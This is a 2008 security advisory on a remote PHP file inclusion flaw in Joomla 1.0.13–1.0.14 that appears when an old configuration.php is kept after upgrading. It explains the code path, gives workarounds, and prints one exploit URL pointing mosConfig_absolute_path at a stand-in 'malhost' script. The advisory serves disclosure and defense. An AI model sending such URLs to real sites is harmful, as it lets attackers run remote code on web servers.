Joomla 1.0.13 - 1.0.14 / (remote) PHP file inclusion possible if old configuration.php
Affects: Joomla 1.0.13 - 1.0.14
Vulnerability: (remote) PHP file inclusion possible if old
configuration.php
Date: 14-feb-2008
Introduction:
Remote PHP file inclusion is possible when RG_EMULATION is not defined
in
configuration.php. This is typical when upgrading from an older version,
leaving configuration.php untouched. Furthermore, in PHP,
register_globals
must be 'off', for this exploit to work.
In Joomla >=1.0.13, configuration.php-dist disables register_globals
emulation, by defining RG_EMULATION false. In older Joomla versions,
this
was defined in globals.php instead.
Users upgrading, without touching configuration.php (quite typical),
will have RG_EMULATION
unset, resulting in the following vulnerability.
In Revision 7424 of globals.php, the 'configuration.php' file is
included
before registerGlobals() is called, allowing a malicious peer to
override any value set in configuration.php.
Details:
Since revision 7424, globals.php includes 'configuration.php' if
RG_EMULATION is unset, and enables RG_EMULATION by default for 'old
configuration files':
if( defined( 'RG_EMULATION' ) === false ) {
if( file_exists( dirname(__FILE__).'/configuration.php' ) ) {
require( dirname(__FILE__).'/configuration.php' );
}
if( defined( 'RG_EMULATION' ) === false ) {
// The configuration file is old so default to on
define( 'RG_EMULATION', 1 );
}
}
The registerGlobals function is called *after* having included
'configuration.php':
} else if (ini_get('register_globals') == 0) {
// php.ini has register_globals = off and emulate = on
registerGlobals();
Maliciously set GET variables cause variables set by configuration.php
to be overwritten.
Looking in index.php:
require( 'globals.php' );
require_once( 'configuration.php' );
Since 'configuration.php' was already included by globals.php, the
require_once() won't include the configuration.php again (leaving
"attacker's" values untouched!).
The exploit:
http://joomlasite/index.php?mosConfig_absolute_path=http://malhost/php_s
cript.txt
Workaround:
In index*.php and administrator/index*.php change:
require_once( 'configuration.php' );
to
require('configuration.php');
Or disable RG_EMULATION by using the line in configuration.php-dist in
configuration.php:
if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); } // Off by
default for security
Regards,
Hendrik-Jan Verheij
BWSS B.V.